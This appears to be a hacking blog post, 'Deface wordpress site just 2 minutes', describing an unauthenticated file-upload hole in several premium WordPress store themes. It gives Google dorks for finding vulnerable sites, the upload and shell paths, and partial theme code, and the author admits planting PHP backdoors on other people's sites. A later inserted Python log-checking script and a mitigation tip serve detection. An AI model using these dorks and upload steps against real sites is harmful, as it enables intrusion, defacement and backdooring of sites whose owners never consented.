Deface wordpress site just 2 minutes
Author: Cyberhero 911
Date and Time: 6:37 PM
Hi.. I want to share a way to deface websites that run the WordPress CMS in a super short time, and here we don't need to hack the site's admin at all..
Hmm.. you must be wondering why I say that. OK, at first I had to change the theme of my office's website, which happens to also run on WordPress. After some idle googling I finally found a nice premium theme.. so I uploaded that theme and edited it however I liked haha.. then suddenly my eye landed on one folder named upload, which had a file upload.php inside.
Roughly, this is what the contents of upload.php look like:

WP-2.6
    require_once($load);
}
else {
    wp_die('Error: Config file not found');
}

global $upload_folder_path;
$today = getdate();
if ($today['month'] == "January") {
    $today['month'] = "01";
}
elseif ($today['month'] == "February") {
    $today['month'] = "02";
}
elseif ($today['month'] == "March") {
    $today['month'] = "03";
}
elseif ($today['month'] == "April") {
    $today['month'] = "04";
}
elseif ($today['month'] == "May") {
    $today['month'] = "05";
}
elseif ($today['month'] == "June") {
    $today['month'] = "06";
}
elseif ($today['month'] == "July") {
    $today['month'] = "07";
}
elseif ($today['month'] == "August") {
    $today['month'] = "08";
}
elseif ($today['month'] == "September") {
    $today['month'] = "09";
}
elseif ($today['month'] == "October") {
    $today['month'] = "10";
}
elseif ($today['month'] == "November") {
    $today['month'] = "11";
}
elseif ($today['month'] == "December") {
    $today['month'] = "12";
}

// Edit upload location here
$imagepath = $General->get_product_imagepath();
if ($imagepath == '') {
    $imagepath = 'products_img';
}

//$destination_path = ABSPATH . "wp-content/uploads/".$today['year']."/".$today['month']."/";
$destination_path = ABSPATH . $upload_folder_path.$imagepath."/";
if (!file_exists($destination_path)) {
    $imagepatharr = explode('/', $upload_folder_path.$imagepath);
    $upload_path = ABSPATH . "$imagepath";
    if (!file_exists($upload_path)) {
        mkdir($upload_path, 0777);
    }
    $year_path = ABSPATH;
    for ($i = 0; $i ...   // the rest of this loop, up to the next statement, is not present on the page
    ...
$digital_product_path = $General->get_digital_productpath();
if ($digital_product_path == '') {
    $digital_product_path = 'digital_products';
}
$digital_destination_path = ABSPATH . "$upload_folder_path".$digital_product_path."/";

$imagepatharr = array();
if (!file_exists($digital_destination_path)) {
    $imagepatharr = explode('/', $digital_product_path);
    $upload_path = ABSPATH . "$upload_folder_path";
    if (!file_exists($upload_path)) {
        mkdir($upload_path, 0777);
    }
    for ($i = 0; $i ...   // the remainder of the file is not present on the page

But when I tried opening upload.php from the browser nothing showed up, so I tried opening index.php for fun, which looks like this..

WP-2.6
    require_once($load);
}
else {
    wp_die('Error: Config file not found');
}

$action = $_GET['img'];
?>
<!-- the HTML upload form that followed here is not present on the page; only its status text survives -->
Uploading Please wait ...

And it turned out an upload form appeared hehehe.. so I kept messing around by uploading a .jpg file, and it succeeded. Why not try uploading a .php file too, who knows, it might become a backdoor.. unexpectedly that worked as well.. so I went on and planted backdoors on websites that use that theme..

For the dorks, use these..

inurl:/wp-content/themes/WPStore
inurl:/wp-content/themes/eShop
inurl:/wp-content/themes/KidzStore
inurl:/wp-content/themes/Emporium
inurl:/wp-content/themes/Store
inurl:/wp-content/themes/eCommerce
inurl:/wp-content/themes/framework
inurl:/wp-content/themes/frameworkold

The path that has the vulnerability:
http://urvictim.com/wp-content/themes/(vulnerability theme path)/upload/

This is the path of the file that was just uploaded:
http://urvictim.com/wp-content/uploads/products_img/

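As an added example, not part of the original post, here is a Python check a site owner can run over web-server access logs to spot the two paths this post points at: a POST to a theme's upload/ endpoint and a later request for a .php file under wp-content/uploads/products_img/ from the same client. The log lines and IP addresses are constructed samples.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (Apache combined format), not taken from the post.
SAMPLE_LOG = """\
203.0.113.5 - - [27/May/2011:19:51:11 +0300] "GET /wp-content/themes/WPStore/upload/ HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
203.0.113.5 - - [27/May/2011:19:51:40 +0300] "POST /wp-content/themes/WPStore/upload/upload.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"
203.0.113.5 - - [27/May/2011:19:52:02 +0300] "GET /wp-content/uploads/products_img/bd.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"
198.51.100.7 - - [27/May/2011:20:10:00 +0300] "GET /wp-content/uploads/products_img/shoe.jpg HTTP/1.1" 200 20311 "-" "Mozilla/5.0"
198.51.100.7 - - [27/May/2011:20:11:00 +0300] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Any theme's upload/ directory (the post lists several themes that ship it).
THEME_UPLOAD_RE = re.compile(r'^/wp-content/themes/[^/]+/upload/')
# Server-side script extensions requested from the uploads tree, where only data files belong.
UPLOADS_SCRIPT_RE = re.compile(r'^/wp-content/uploads/.*\.(php\d?|phtml|phar)(\?|$)', re.I)


def find_upload_abuse(log_text):
    """Return (ip, kind, path) findings for theme-upload POSTs and scripts served from uploads."""
    findings = []
    posted = defaultdict(bool)  # ip -> has already POSTed to a theme upload endpoint
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path = m.group('ip'), m.group('method'), m.group('path')
        if method == 'POST' and THEME_UPLOAD_RE.match(path):
            posted[ip] = True
            findings.append((ip, 'theme-upload-post', path))
        elif UPLOADS_SCRIPT_RE.match(path) and m.group('status') == '200':
            # A script executing from uploads is bad on its own; after a POST to the
            # upload endpoint from the same client it is the full sequence the post describes.
            kind = 'script-run-after-upload' if posted[ip] else 'script-under-uploads'
            findings.append((ip, kind, path))
    return findings


if __name__ == '__main__':
    for ip, kind, path in find_upload_abuse(SAMPLE_LOG):
        print(f'{kind:24} {ip:15} {path}')
```

Denying execution of .php files under wp-content/uploads at the web-server level stops the final step regardless of which theme shipped the uploader.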
For the video tutorial, click here:
Demo

happy hacking all.. :)

2 comments:

Anonymous said...

What's the RAR password??
Thanks

Cyberhero 911 said...

Sorry, I only just got around to replying..

The password: YxkmpJJZbXaIjANCGg0Tyxi0

It's the same as the name of the zip file :)

 

Explore ur brain © 2016 Confusing better than Conjuring